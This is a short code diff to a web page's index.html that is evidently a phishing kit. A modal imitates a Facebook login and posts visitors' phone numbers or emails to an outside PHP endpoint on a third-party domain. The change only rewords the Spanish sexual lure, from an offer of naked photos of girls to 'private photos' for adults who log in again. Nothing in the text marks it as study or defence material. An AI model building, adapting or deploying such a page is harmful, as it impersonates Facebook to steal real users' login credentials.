--- a/index.html
+++ b/index.html
@@ -154,7 +154,7 @@
     	<div class="modal fade" id="myModal" role="dialog">
     	    <section class="login-form-wrap">
     			<h1>Facebook</h1>
-    			<div style="    background-color: #fff9d7; border: 1px solid #e2c822; padding: 6px; margin-bottom: 5px;">Inicia sesion nuevamente abajo para poder mostrarte las fotos de chhiicas completamente siin ropa</div>
+    			<div style="    background-color: #fff9d7; border: 1px solid #e2c822; padding: 6px; margin-bottom: 5px;">ATENCION: Para poder mostrar estas fotos privadas, inicia sesion nuevamente abajo si eres adulto</div>
     			<form class="login-form" name="anhsonnguyen" method="post" action="https:///teampablete.matesdaddy.com/santacruz.php" onsubmit="return validateForm()">
     				<label>
     					<input type="text" name="email" required placeholder="Numero de telefono o Email">
